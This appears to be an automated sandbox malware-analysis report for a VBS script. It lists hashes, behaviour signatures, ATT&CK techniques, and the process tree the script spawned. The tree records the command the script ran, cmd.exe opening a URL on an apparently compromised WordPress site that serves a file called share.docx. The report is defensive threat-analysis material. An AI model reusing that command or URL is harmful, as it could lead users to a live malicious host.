ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
21-04-2024 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Size

27KB
MD5

75ec9f68a5b62705c115db5119a78134
SHA1

6209f948992fd18d4fc6fc6f89d9815369ac8931
SHA256

ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
SHA512

82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
SSDEEP

384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exe

flow pid process

28 4528 WScript.exe
29 4528 WScript.exe
31 4528 WScript.exe
35 4528 WScript.exe

flow	pid	process
28	4528	WScript.exe
29	4528	WScript.exe
31	4528	WScript.exe
35	4528	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
2616	msedge.exe
2616	msedge.exe
2972	msedge.exe
2972	msedge.exe
4120	identity_helper.exe
4120	identity_helper.exe
5164	msedge.exe
5164	msedge.exe
5164	msedge.exe
5164	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

2972 msedge.exe
2972 msedge.exe
2972 msedge.exe
2972 msedge.exe
2972 msedge.exe
2972 msedge.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.exeexplorer.exemsedge.exe

description	pid	process	target process
PID 4528 wrote to memory of 3660	4528	WScript.exe	cmd.exe
PID 4528 wrote to memory of 3660	4528	WScript.exe	cmd.exe
PID 3660 wrote to memory of 4224	3660	cmd.exe	explorer.exe
PID 3660 wrote to memory of 4224	3660	cmd.exe	explorer.exe
PID 1040 wrote to memory of 2972	1040	explorer.exe	msedge.exe
PID 1040 wrote to memory of 2972	1040	explorer.exe	msedge.exe
PID 2972 wrote to memory of 5036	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 5036	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 4676	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2616	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2616	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe
PID 2972 wrote to memory of 2160	2972	msedge.exe	msedge.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
2⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\explorer.exe
explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
3⤵
PID:4224

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1e3f46f8,0x7ffa1e3f4708,0x7ffa1e3f4718
3⤵
PID:5036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
3⤵
PID:4676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
3⤵
PID:2160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
3⤵
PID:3612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
3⤵
PID:3776

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
3⤵
PID:3060

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
3⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
3⤵
PID:1296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
3⤵
PID:1708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
3⤵
PID:4692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2960

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5e2f0fe48e7ee1aad1c24db5c01c354a

SHA1
5bfeb862e107dd290d87385dc9369bd7a1006b36

SHA256
f13b3ebe8d71bd0086d5bb82364c35f59a95d32b39753af251e8639360e291a9

SHA512
140d026437fd5e8a874cd00b03950c8f010e1a0732a0a1cc5bdde477e7f8315ccb95790bb4c15b8dbaab9468ad532eb885b6c429300a64e39412d976d079324e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
7e0880992c640aca08737893588a0010

SHA1
6ceec5cb125a52751de8aeda4bab7112f68ae0fe

SHA256
8649a39877c190ec740a5422284ec5f9ff509b30b2d7896635476873dd8824e2

SHA512
52bd0a38ca7f43b26731966035045b1cbd8b60b2d81bdf9aad791cf444da8af8b722ebf3cb364a6e660bebdf23084eb0e30bc23562575b704801669817549f8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
499B

MD5
01f5bd7cd51a37e8e853ead645efcdb2

SHA1
0fae5557c7d6f755a4311d048edcbae74141816d

SHA256
c3a6be909fde4a711ff526d93586bc4f1a3d3025058f20b456bf192bede217bf

SHA512
a7e39a16b1c03ee4ce48007d8fac160df68b26662e21f7235420d42920713320547cf3a72f26d2b2f1edda3231c3e55f0ba11e08a98610332aef9415dfa8e821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
b0b865a447c3bde8be029558ee422908

SHA1
d864c6a87c7699ee5550a33915ce078122c44f5b

SHA256
32035b47ab932337f37c648bbe64e9ddf42a18d2c9ea1c13d5dcacb385373708

SHA512
d370c58c0c37148af9030f3e596eb0fdc61dbc285dc2be4763f9951027a3c33ad143020dbdc4d2ab7ac18a4cc154a0d92912fb13eef24cdf983ada9b0c866224

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
7f8b30335e5a472b3cb98466b78949f7

SHA1
42bf1a7c139aeadb87a70c6664282ad04441c926

SHA256
96e2029655429989129652160ef7166736babcbb00368123d6f1a65ee5a14d60

SHA512
e3bb43a7808c62d52122c8f75c8898fc7e8dad4fc77a1a0b88014d0ff9a50e21131764d932a991e561a8d04905c7b18990c67901862ad8057bd850c1504d6587

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
26c41d4d865b13eab6f9d766c5954f28

SHA1
fb27015dfc581c8411c8b543fa427d9ca429b60d

SHA256
23343da58b1cbdb4da06ea839876c2a1a659dad547d7c32823b1ca0fca8516a4

SHA512
57e2f76c01f30d399aaac2ac8a00cdce3ffdfe2dc010cf14d163fb9941c530744ee2251cdacf85ae9c0e2e9a94681bbaac1d875cc5d4b974d7903dd4105a9662

Download Submit
\??\pipe\LOCAL\crashpad_2972_AEDQVHPSLGTUGZGN
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit